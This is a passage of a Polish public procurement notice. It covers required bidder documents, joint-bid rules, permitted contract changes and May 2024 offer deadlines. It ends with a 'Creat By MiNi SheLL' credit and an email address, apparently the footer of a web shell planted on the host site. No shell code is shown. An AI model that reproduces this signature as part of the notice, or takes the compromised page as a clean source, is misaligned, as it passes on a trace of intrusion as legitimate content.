Załącznikiem nr 4 do SWZ,<br/>2) informacji odpowiadającej odpisowi aktualnemu lub pełnemu z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonej nie wcześniej niż 3 (słownie: trzy) miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>3) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie z Załącznikiem nr 5 do SWZ,<br/>4) wykazu dostaw, a w przypadku świadczeń okresowych lub ciągłych – wykonywanych, w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych - są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 (słownie: trzech) miesięcy – zgodnie z Załącznikiem nr 6 do SWZ,<br/>5) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć: <br/>1)	Formularz Oferty,<br/>2)	oświadczenia, o których mowa w rozdz. XVII ust. 1 SWZ,<br/>3)	zobowiązanie innego podmiotu, o którym mowa w rozdz. XVIII ust. 3 SWZ,<br/>4)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy do złożenia oferty (o ile ofertę składa pełnomocnik),<br/>5)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile oferta składana jest przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi zostać załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale XVII ust. 1 SWZ składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z treścią art. 455 ust. 1 pkt 1 PZP Zamawiający dopuszcza zmianę postanowień umowy w następujących przypadkach:<br/>1) gdy niedotrzymanie pierwotnego terminu realizacji umowy, stanowi konsekwencję działania sił wyższych niezależnych od Wykonawcy, nie stanowiących jego i podwykonawców problemów organizacyjnych, których nie można było przewidzieć, poza zdarzeniami zwykłymi – Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy o czas niezbędny do usunięcia konsekwencji działania siły wyższej. Przez siłę wyższą należy rozumieć zdarzenie niezależne od Wykonawcy, nie stanowiące jego problemów organizacyjnych, którego Strony umowy nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogły przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z umowy. Siła wyższa obejmuje w szczególności zdarzenia żywiołowe, jak bardzo niskie temperatury powietrza lub ciągłe ulewne deszcze uniemożliwiające zachowanie wymogów technologicznych, zagrożenie epidemiologiczne, epidemia, zamieszki, wojny, pożary, huragany, trzęsienia ziemi, promieniowanie, strajk generalny lub branżowy,<br/>2) gdy dokonanie zmiany umowy jest korzystne dla Zamawiającego, a w szczególności:<br/>a) może obniżyć koszt realizacji Przedmiotu umowy,<br/>b) może przyczynić się do podniesienia jakości wykonania Przedmiotu umowy,<br/>c) może przyczynić się do usprawnienia i podniesienia efektywności wykonania Przedmiotu umowy,<br/>3) w razie, gdy podczas wykonania Przedmiotu umowy zaistnieje konieczność dokonania aktualizacji, uszczegółowienia, wykładni lub doprecyzowania poszczególnych postanowień umowy, niepowodujących zmiany celu i istoty umowy,<br/>4) w razie wystąpienia konieczności wprowadzenia aneksu do umowy o charakterze informacyjnym i instrukcyjnym, niezbędnej do realizacji umowy, jeśli zmiany te nie mają charakteru istotnego,<br/>5) gdy obiektywnie jest to niezbędne dla zachowania i realizacji celów umowy, dla których została ona zawarta,<br/>6) gdy zmiany wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego. Zmiany w tym zakresie ograniczone będą wyłącznie do dostosowania umowy do zmienionych regulacji prawnych.<br/>7) w zakresie wynagrodzenia Wykonawcy, gdy w okresie trwania umowy zmianie ulegną: <br/>a) stawki podatku od towarów i usług (VAT) – w takim przypadku wynagrodzenie umowne zostanie zmienione odpowiednio do zmian stawek podatku od towarów i usług (VAT),<br/>b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę (Dz.U. z 2020 r. poz. 2207 z późn. zm.) - o ile zmiany te będą miały wpływ na koszty wykonywania Przedmiotu umowy przez Wykonawcę,<br/>c) zasady podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - o ile zmiany te będą miały wpływ na koszty wykonywania Przedmiotu umowy przez Wykonawcę,<br/>d) zasady gromadzenia i wysokości wpłat pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 roku o pracowniczych planach kapitałowych (Dz.U. z 2023 r. poz. 46 z późn. zm.) - o ile zmiany te będą miały wpływ na koszty wykonywania Przedmiotu umowy przez Wykonawcę.<br/><br/>Zamawiający dopuszcza możliwość zmian postanowień umowy w innych niż określone w ust. 1 powyżej sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych.<br/><br/>Nie stanowi zmiany umowy zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między Stronami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-13 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ze względu na ograniczenia formularza, szczegółowe informacje zawarte są w SWZ i OPZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com